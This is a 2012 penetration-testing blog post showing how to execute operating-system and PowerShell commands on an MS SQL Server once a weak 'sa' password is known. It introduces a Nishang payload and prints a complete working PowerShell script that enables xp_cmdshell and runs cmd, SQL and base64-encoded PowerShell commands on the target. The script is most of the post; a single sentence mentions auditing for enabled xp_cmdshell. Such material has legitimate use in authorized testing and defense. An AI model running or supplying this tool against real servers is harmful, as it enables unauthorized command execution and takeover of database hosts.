Friday, December 7, 2012

Command Execution on MS SQL Server using PowerShell

One of my favorite "vulnerabilities" during pen tests is an easy or guessable password for "sa" on an MS SQL Server with mixed-mode authentication enabled: it means instant pwnage. It is a bit harder to find nowadays (newer SQL Server versions can apply the Windows password policy, including complexity rules, to SQL logins), but you would still manage to get a couple of them in a large environment. This post is just one more method to exploit this misconfiguration.

I try to use PowerShell in my pen tests as far as I can, and this method is the result of one such pen test: I wanted to execute commands on one of the production SQL servers with PowerShell :)

My search led me to this blog post by Niklas. I had already included, with permission, the script discussed in that post in Nishang 0.2.0 as Get-SqlSysLogin.ps1. But there is more to that post: it also discusses how to execute commands on the SQL server using PowerShell. I implemented the technique in a new Nishang payload, Execute-Command-MSSQL.

Let's get started.

My lab setup was SQL Server 2008 Express on a Windows 7 machine. I set the "sa" password to the weak value "sa1234", which I have seen in one of my previous pen tests.

Execute-Command-MSSQL takes three mandatory parameters: the IP address or ComputerName to connect to, the username of an admin (sysadmin) login on the SQL server, and the password for that user.

If the connection succeeds and the credentials work, the payload enables xp_cmdshell on the SQL server (it is disabled by default; turning it on through sp_configure requires sysadmin rights, which "sa" has).

Now we can choose one of three "shells": a PowerShell shell, a SQL shell, or a cmd shell.

SQL shell: runs T-SQL queries on the server and shows the result rows.

cmd shell: the plain old Windows cmd shell, for machines without PowerShell (not tested on older machines).

PowerShell shell: a PowerShell "shell"; each command is handed to powershell.exe on the target through xp_cmdshell.

These different "shells" give us great opportunities for some really effective post exploitation.

Note that although the shells appear to be persistent, they are not: each command is executed in a new process, so state such as the current directory or environment variables does not carry over from one command to the next. The shell prompt is shown just for user friendliness :)
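To make the mechanics of the three "shells" concrete, here is an added example script of my own that is not the Nishang Execute-Command-MSSQL payload: it connects with SQL authentication, enables xp_cmdshell the way described above, verifies the setting in sys.configurations, and then runs one command through each shell. The target address, login and password are assumed lab values, and the function names are mine.

```powershell
# Added example, not the Nishang Execute-Command-MSSQL payload itself.
# Target and credentials below are assumed lab values; replace them with your own.
param(
    [string]$ComputerName = '192.168.1.10',
    [string]$Username     = 'sa',
    [string]$Password     = 'sa1234'
)

function New-SqlConnection {
    param([string]$ComputerName, [string]$Username, [string]$Password)
    # SQL (not Windows) authentication: this only works when mixed mode is enabled.
    $connStr = "Server=$ComputerName;Database=master;User Id=$Username;Password=$Password;Connection Timeout=10;"
    $conn = New-Object System.Data.SqlClient.SqlConnection -ArgumentList $connStr
    $conn.Open()
    return $conn
}

function Invoke-SqlQuery {
    # Runs a T-SQL batch and returns each result row as one tab-joined string.
    param([System.Data.SqlClient.SqlConnection]$Connection, [string]$Query)
    $cmd = $Connection.CreateCommand()
    $cmd.CommandText = $Query
    $reader = $cmd.ExecuteReader()
    $rows = @()
    try {
        while ($reader.Read()) {
            $cols = 0..($reader.FieldCount - 1) | ForEach-Object {
                if ($reader.IsDBNull($_)) { '' } else { $reader.GetValue($_).ToString() }
            }
            $rows += ($cols -join "`t")
        }
    } finally { $reader.Close() }
    return $rows
}

function Enable-XpCmdShell {
    param([System.Data.SqlClient.SqlConnection]$Connection)
    # Both sp_configure calls need sysadmin; RECONFIGURE applies the change immediately.
    $cmd = $Connection.CreateCommand()
    $cmd.CommandText = @"
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
"@
    [void]$cmd.ExecuteNonQuery()
    # Check that the change actually took effect before trying to use it.
    $state = @(Invoke-SqlQuery $Connection "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'")
    if ($state[0] -ne '1') { throw "xp_cmdshell is still disabled on $($Connection.DataSource)" }
}

function Invoke-CmdShell {
    # "cmd shell": run an OS command via xp_cmdshell. Single quotes are doubled so the
    # command text cannot break out of the T-SQL string literal it is embedded in.
    param([System.Data.SqlClient.SqlConnection]$Connection, [string]$Command)
    $escaped = $Command.Replace("'", "''")
    # xp_cmdshell ends its output with a NULL row; drop it.
    Invoke-SqlQuery $Connection "EXEC master..xp_cmdshell '$escaped'" | Where-Object { $_ -ne '' }
}

function Invoke-PsShell {
    # "powershell shell": same path, but the command is passed as -EncodedCommand so the
    # nested quotes never have to be escaped twice (once for T-SQL, once for cmd.exe).
    param([System.Data.SqlClient.SqlConnection]$Connection, [string]$Command)
    $encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
    Invoke-CmdShell $Connection "powershell.exe -NoProfile -NonInteractive -EncodedCommand $encoded"
}

$conn = New-SqlConnection $ComputerName $Username $Password
Enable-XpCmdShell $conn

# SQL shell
Invoke-SqlQuery $conn "SELECT @@VERSION"

# cmd shell: the command runs as the SQL Server service account (or its xp_cmdshell proxy)
Invoke-CmdShell $conn "whoami"

# PowerShell shell
Invoke-PsShell $conn 'Get-Process | Select-Object -First 3 Name, Id | Format-Table -AutoSize | Out-String'

# Every call is a fresh process, so state such as the working directory is not kept:
Invoke-CmdShell $conn "cd C:\"   # the directory change lives and dies in this process
Invoke-CmdShell $conn "cd"       # prints xp_cmdshell's default directory again, not C:\

$conn.Close()
```

Running the script against the lab box prints the SQL Server version string, the service account name from whoami, three process names from the encoded PowerShell command, and then the same default directory twice for the two cd calls, which is the non-persistence the note above warns about. On the defensive side, the same sys.configurations query is a quick audit for servers where xp_cmdshell has been left enabled.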

You can download Nishang 0.2.1 here or update your repositories.

Hope this is helpful. I look forward to feedback, comments and feature requests.